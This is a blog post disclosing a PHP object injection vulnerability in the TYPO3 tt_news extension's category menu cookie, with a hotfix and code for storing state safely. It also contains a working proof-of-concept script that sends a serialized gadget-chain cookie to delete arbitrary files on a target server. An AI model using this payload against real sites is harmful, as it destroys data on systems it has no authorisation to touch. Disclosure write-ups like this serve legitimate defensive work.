pascal jungblut posts

Object Injection Vulnerability in tt_news

Disclaimer: I reported this vulnerability on September 12th, 2013 and got a response by September 16th. Nothing has happened since. I asked for an update on February 4th and haven’t received a response yet. Update February 12th: The TYPO3 security team released a security bulletin and a fixed version for the issue. Thanks!

Object Injection

What is object injection and why is it a problem? An object injection vulnerability allows the attacker to instantiate arbitrary objects. Just think of something like this:

unserialize($_GET['my_param']);

If the class of the object you create evals something in its __wakeup() method (which PHP calls when the object is unserialized) or, say, unlinks a file in its destructor, the attacker will be able to do some damage. For more information see the OWASP wiki on ‘PHP Object Injection’.

Bug

“tt_news” is the most common extension to display news on a TYPO3-powered website. It can display a category menu, so the user can switch between several news categories. The state gets serialized and then saved in a cookie. In another request, the cookie will be loaded and unserialized. Cookies are sent by the user, so their contents are under the attacker's control.

<?php
// lib/class.tx_ttnews_catmenu.php:337
$this->stored = unserialize($_COOKIE[$this->treeName]);
?>

tt_news >= 3.0.0 is affected.

Hotfix

Store the data in a session instead. Note that only sites that display the CATMENU plugin are affected.
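
One way to apply this hotfix, as an added example that is not tt_news or TYPO3 code. The function names, the 'catmenu' session key and the state shape (category id mapped to an open/closed flag) are assumptions made for illustration; the second half shows a validated JSON cookie for sites that cannot move the state into the session.

```php
<?php
// Added example, not tt_news code: function names, the 'catmenu' session key
// and the state shape (category id => open/closed flag) are assumptions.

// Hotfix from the post: keep the menu state server-side, so the client only
// ever sends an opaque session id and never bytes that reach unserialize().
function saveTreeState(string $treeName, array $state): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $_SESSION['catmenu'][$treeName] = $state;
}

function loadTreeState(string $treeName): array
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $state = $_SESSION['catmenu'][$treeName] ?? [];
    return is_array($state) ? $state : [];
}

// If the state must stay in a cookie: JSON can only yield scalars and arrays,
// and every entry is still checked against the expected shape.
function parseTreeCookie(string $raw): array
{
    $decoded = json_decode($raw, true, 4);
    if (!is_array($decoded)) {
        return [];                      // not JSON (e.g. a serialized object)
    }
    $clean = [];
    foreach ($decoded as $id => $open) {
        if (is_int($id) && $id >= 0 && in_array($open, [0, 1, true, false], true)) {
            $clean[$id] = (bool) $open;
        }
    }
    return $clean;
}

// Constructed inputs: a serialized-object string and a JSON state with two
// valid entries and two entries that fail the shape check.
if (PHP_SAPI === 'cli') {
    var_dump(parseTreeCookie('a:1:{i:500;O:8:"stdClass":0:{}}'));
    var_dump(parseTreeCookie('{"500":1,"501":0,"x":1,"502":"1"}'));
}
```

On PHP 7.0 and later, unserialize($raw, ['allowed_classes' => false]) also prevents object instantiation where legacy serialized cookies still have to be read.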

PoC

  1. Load Swift_ByteStream_TemporaryFileByteStream
  2. Set path to delete
  3. ????
  4. Profit

<?php
if (!isset($argv[1]) || !isset($argv[2])) die('usage:' . $argv[0] . " <news_url> <file_to_delete>\n");

// load the typo3 mailer. it will include swift
// the Swift_ByteStream_TemporaryFileByteStream will unlink $this->_path in the destructor
$payload = 'a:2:{i:500;O:26:"TYPO3\CMS\Core\Mail\Mailer":0:{}i:501;O:40:"Swift_ByteStream'.
'_TemporaryFileByteStream":1:{s:38:"' ."\0" . 'Swift_ByteStream_FileByteStream' . "\0".
'_path";s:' . strlen($argv[2]) . ':"'. $argv[2] .'";}}}';

$c = curl_init(); 
curl_setopt($c, CURLOPT_URL, $argv[1] . '?no_cache=1'); 
curl_setopt($c, CURLOPT_COOKIE, 'ttnewscat=' . urlencode($payload));
curl_exec($c);
curl_close($c);

After a bit of experimenting I was able to write arbitrary files to disk.

Responsible Disclosure

It was the first time I approached a major open source project with a (rather small) vulnerability. I chose responsible disclosure because I see no point in unnecessarily harming anyone. However, although this extension is not part of the core CMS and not that many instances may be affected by this particular bug, it’s still a widely spread extension and you can download it from the official TYPO3 website (like any other extension, too). The project encourages you to disclose security bugs in extensions to the security team. I’m a bit disappointed about the whole experience. I recently found a major bug in the CMS core itself and a working exploit is almost ready, but I’m not sure anymore if I want to go down the responsible disclosure road again.